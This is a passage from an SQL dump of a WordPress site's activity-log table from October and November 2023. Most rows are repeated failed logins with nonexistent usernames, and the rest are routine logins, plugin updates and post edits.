exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37706,'2023-10-14 03:56:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37707,'2023-10-14 04:04:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37708,'2023-10-14 04:07:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37709,'2023-10-14 04:18:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37710,'2023-10-14 04:29:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37711,'2023-10-14 04:32:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37712,'2023-10-14 04:40:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37713,'2023-10-14 04:51:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37714,'2023-10-14 05:02:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37715,'2023-10-14 05:13:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37716,'2023-10-14 05:24:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37717,'2023-10-14 05:34:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37718,'2023-10-14 05:45:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37719,'2023-10-14 05:56:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37720,'2023-10-14 06:00:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37721,'2023-10-14 06:07:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37722,'2023-10-14 06:18:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37723,'2023-10-14 06:21:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37724,'2023-10-14 06:29:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37725,'2023-10-14 06:34:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37726,'2023-10-14 06:40:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37727,'2023-10-14 06:45:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37728,'2023-10-14 06:50:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(37729,'2023-10-14 06:58:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40988,'2023-11-03 16:58:16','SimpleUserLogger','info','Logged in','6cfe89de80872fcb511ec767d68e445a','wp_user'),(40989,'2023-11-03 16:58:59','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','7d8aa74b10884b030344fbc205af2200','wp_user'),(40990,'2023-11-03 16:59:50','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','74c922bd7720609e0f8b2189851a8e7a','wp_user'),(40991,'2023-11-03 17:00:15','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','072c93582ea87810fd46893a1efba246','wp_user'),(40992,'2023-11-03 17:00:41','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','3b0b2814d22aba5e4ec08dd382056a93','wp_user'),(40993,'2023-11-03 17:09:43','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','8680f2c4fc8fb39e13855902c6b5d050','wp_user'),(40994,'2023-11-03 17:10:10','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','8b08bfd644c5ccb45f09bbdf95d37ecf','wp_user'),(40995,'2023-11-03 17:12:25','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(40996,'2023-11-04 05:37:02','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','280d7e200b046e44684f040360d4cec8','wp'),(40997,'2023-11-04 14:32:00','SimpleUserLogger','info','Logged in','87c0b030fb7ede51bf3f2434cbf46021','wp_user'),(40998,'2023-11-04 14:33:54','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7392c4660d5cf4a6127a2d5ad48e3a48','wp_user'),(40999,'2023-11-04 14:38:04','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','88f430fe9250e194112f83a881b3b6d5','wp_user'),(41000,'2023-11-04 14:38:24','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7392c4660d5cf4a6127a2d5ad48e3a48','wp_user'),(41001,'2023-11-04 14:43:11','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7392c4660d5cf4a6127a2d5ad48e3a48','wp_user'),(41002,'2023-11-04 15:18:00','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','eab3f568c9389110593587045521a200','other'),(41003,'2023-11-04 15:18:43','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','b0f30e254c199377bb0a9c64b6bafe7c','other'),(41004,'2023-11-04 15:23:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(41005,'2023-11-04 15:23:44','SimpleUserLogger','info','Logged in','6cfe89de80872fcb511ec767d68e445a','wp_user'),(41006,'2023-11-04 16:03:52','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','0383ebcddfbfea2afd4d830ea8ee60ab','other'),(41007,'2023-11-04 17:27:54','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41008,'2023-11-04 17:30:14','SimpleUserLogger','info','Logged in','6cfe89de80872fcb511ec767d68e445a','wp_user'),(41009,'2023-11-04 17:31:01','SimplePostLogger','info','Created {post_type} \"{post_title}\"','7999948d34bc6211884e30a9e555c838','wp_user'),(41010,'2023-11-04 17:31:24','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','3a3db8859c351b1011c4719282abf46a','wp_user'),(41011,'2023-11-04 17:31:35','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','3a3db8859c351b1011c4719282abf46a','wp_user'),(41012,'2023-11-04 17:32:38','SimplePostLogger','info','Created {post_type} \"{post_title}\"','d6f852b62a747f065600f9704297f53c','wp_user'),(41013,'2023-11-04 17:33:04','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','36c504e7c818aa284b1ab9421586b756','wp_user'),(41014,'2023-11-04 17:38:52','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','ea4199eba98ae31f3b58e875150b8bbe','wp_user'),(41015,'2023-11-04 17:42:33','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','2bd52d4080a2a5015e30af8a2f3303d1','wp_user'),(41016,'2023-11-04 17:43:53','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','36c504e7c818aa284b1ab9421586b756','wp_user'),(41017,'2023-11-04 17:56:24','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41018,'2023-11-04 18:01:37','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41019,'2023-11-04 18:03:01','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41020,'2023-11-04 18:03:33','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41021,'2023-11-04 18:05:32','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41022,'2023-11-04 18:06:57','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41023,'2023-11-04 18:08:38','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41024,'2023-11-04 18:09:30','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41025,'2023-11-04 18:11:49','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41026,'2023-11-04 23:35:09','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e399ca953cd62a6bcc9342314e0c62a6','other'),(41027,'2023-11-04 23:35:50','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','0d3d7be3251da93d772db157f646d90c','other'),(41028,'2023-11-04 23:38:51','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(41029,'2023-11-05 02:51:29','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(39527,'2023-10-22 16:04:32','SimpleHistoryLogger','info','Removed {num_rows} events that were older than {days} days','34c7f2438b44cb69f4b3979f81942fc5','wp'),(39528,'2023-10-22 16:21:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39529,'2023-10-22 16:39:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39530,'2023-10-22 16:57:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39531,'2023-10-22 17:15:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39532,'2023-10-22 17:30:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39533,'2023-10-22 17:34:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39534,'2023-10-22 17:51:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39535,'2023-10-22 17:52:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39536,'2023-10-22 18:10:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39537,'2023-10-22 18:28:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39538,'2023-10-22 18:47:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39539,'2023-10-22 19:05:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39540,'2023-10-22 19:23:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39541,'2023-10-22 19:42:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39542,'2023-10-22 20:00:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39543,'2023-10-22 20:19:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39544,'2023-10-22 20:19:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39545,'2023-10-22 20:51:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39546,'2023-10-23 00:26:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39547,'2023-10-23 01:41:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39548,'2023-10-23 02:52:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39549,'2023-10-23 05:18:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39550,'2023-10-23 05:53:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39551,'2023-10-23 06:31:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39552,'2023-10-23 07:09:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39553,'2023-10-23 07:47:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39554,'2023-10-23 08:26:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39555,'2023-10-23 09:06:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39556,'2023-10-23 09:21:15','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','f99cae03929ab01faabeb0ef42e17841','wp'),(39557,'2023-10-23 09:34:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39558,'2023-10-23 09:46:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39559,'2023-10-23 10:27:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39560,'2023-10-23 11:08:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39561,'2023-10-23 11:16:54','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','e0e0afb410ff250d2b77232723bdd70a','wp'),(39562,'2023-10-23 11:46:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39563,'2023-10-23 11:49:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39564,'2023-10-23 12:30:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39565,'2023-10-23 13:11:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39566,'2023-10-23 13:27:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39567,'2023-10-23 13:53:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39568,'2023-10-23 14:35:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39569,'2023-10-23 15:12:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39570,'2023-10-23 15:17:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39571,'2023-10-23 15:59:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39572,'2023-10-23 16:29:03','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','9c714838bd89fd64768718945bb61625','wp'),(39573,'2023-10-23 16:42:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39574,'2023-10-23 16:58:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39575,'2023-10-23 17:24:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39576,'2023-10-23 18:07:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39577,'2023-10-23 18:07:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39578,'2023-10-23 18:18:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39579,'2023-10-23 18:30:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39580,'2023-10-23 18:42:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39581,'2023-10-23 18:48:59','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','25c510268d1cf8e1804af6e8d67157ef','other'),(39582,'2023-10-23 18:49:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39583,'2023-10-23 18:51:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39584,'2023-10-23 18:51:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39585,'2023-10-23 18:51:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39586,'2023-10-23 18:51:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39587,'2023-10-23 18:51:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39588,'2023-10-23 18:51:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39589,'2023-10-23 18:51:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39590,'2023-10-23 18:51:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39591,'2023-10-23 18:51:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39592,'2023-10-23 18:51:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39593,'2023-10-23 18:51:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39594,'2023-10-23 18:51:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39595,'2023-10-23 19:06:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39596,'2023-10-23 19:06:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39597,'2023-10-23 19:19:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39598,'2023-10-23 19:31:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39599,'2023-10-23 19:32:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39600,'2023-10-23 19:44:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39601,'2023-10-23 19:57:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39602,'2023-10-23 20:09:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(41102,'2023-11-13 22:29:27','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(41103,'2023-11-13 23:08:24','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41104,'2023-11-14 00:11:57','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','cdffca21197be664c70bff7d233a8c39','other'),(41105,'2023-11-14 03:04:23','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','fece8354ed9b4c1391c0eee99ac4888e','other'),(41106,'2023-11-14 07:02:33','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','c7e3397f50e4591dc5d2a9fad8693e99','wp'),(41107,'2023-11-14 10:03:58','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','2d5dde281777c3e5bc183f7891c19267','wp'),(41108,'2023-11-14 20:58:18','SimpleUserLogger','info','Logged in','6cfe89de80872fcb511ec767d68e445a','wp_user'),(41109,'2023-11-14 21:02:44','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','bc52014ad927612bc56e7a9da1b40af9','wp_user'),(41110,'2023-11-14 21:03:04','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','516e9ba84e1632b5a219c664bea78761','wp_user'),(41111,'2023-11-14 21:03:20','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','b0d028638c41fd11fd751fd9d51b394c','wp_user'),(41112,'2023-11-14 21:04:16','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','9b5b3dba7a4dba000f0c08843982ae34','wp_user'),(41113,'2023-11-14 21:05:29','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','518e1f505116076d775fbb7029a65036','wp_user'),(41114,'2023-11-14 21:05:45','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','35c2a7bc6dc55d4cd52c74ebebca82d1','wp_user'),(41115,'2023-11-14 21:06:15','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','d7f197f84e0a8923ed816a82bbb66230','wp_user'),(41116,'2023-11-14 21:07:56','SimplePluginLogger','info','Activated plugin \"{plugin_name}\"','9b2384b4f1dcb4df4be645f058e71017','wp_user'),(41117,'2023-11-14 21:10:31','SimplePluginLogger','info','Deactivated plugin \"{plugin_name}\"','6033fa805659c868fc2e881012e1e4a3','wp_user'),(41118,'2023-11-14 21:20:51','SimplePluginLogger','info','Activated plugin \"{plugin_name}\"','9b2384b4f1dcb4df4be645f058e71017','wp_user'),(41119,'2023-11-14 21:22:26','SimplePluginLogger','info','Deactivated plugin \"{plugin_name}\"','6033fa805659c868fc2e881012e1e4a3','wp_user'),(41120,'2023-11-14 22:00:28','SimplePluginLogger','info','Deactivated plugin \"{plugin_name}\"','5bc102711fc46714b347ed6fecb26208','wp_user'),(41121,'2023-11-14 22:03:54','SimplePluginLogger','info','Activated plugin \"{plugin_name}\"','644098ef27d511b56e7d5da97b05898b','wp_user'),(41122,'2023-11-14 22:04:20','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41123,'2023-11-15 00:38:46','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','50594f2b7a87a5cac4476cbb91142cb0','other'),(41124,'2023-11-15 14:50:26','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','59b7dc6c922d0264631a488e39b7e47d','other'),(41125,'2023-11-15 16:19:19','SimpleUserLogger','info','Logged in','6cfe89de80872fcb511ec767d68e445a','wp_user'),(41126,'2023-11-15 16:35:53','SimpleUserLogger','info','Logged in','6cfe89de80872fcb511ec767d68e445a','wp_user'),(41127,'2023-11-15 17:05:19','SimplePluginLogger','info','Activated plugin \"{plugin_name}\"','9b2384b4f1dcb4df4be645f058e71017','wp_user'),(41128,'2023-11-15 17:06:11','SimplePluginLogger','info','Deactivated plugin \"{plugin_name}\"','6033fa805659c868fc2e881012e1e4a3','wp_user'),(41129,'2023-11-15 17:36:40','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41130,'2023-11-15 17:44:28','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(41131,'2023-11-15 17:57:00','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(41132,'2023-11-15 18:01:38','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41133,'2023-11-15 18:02:17','SimpleUserLogger','info','Logged in','2ee7e5cfdc670db97581c43c8451f6f0','wp_user'),(41134,'2023-11-15 18:03:23','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41135,'2023-11-15 18:05:42','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(41136,'2023-11-15 18:24:21','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41137,'2023-11-16 17:04:46','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','0ac9d16724fc9d705363da1765571702','wp'),(41138,'2023-11-16 21:12:36','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','a0dc15b43f63404682bb34a599b54043','wp'),(41139,'2023-11-16 23:39:04','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(41140,'2023-11-16 23:48:04','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41141,'2023-11-16 23:48:04','Plugin_DuplicatePost','info','Cloned \"{duplicated_post_title}\" to a new post','2cf0cfa4807c3611d392d971f1feddd5','wp_user'),(41142,'2023-11-16 23:49:06','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41143,'2023-11-16 23:50:22','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41144,'2023-11-16 23:51:27','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41145,'2023-11-16 23:52:29','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41146,'2023-11-16 23:54:55','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41147,'2023-11-16 23:55:55','SimplePostLogger','info','Updated {post_type} 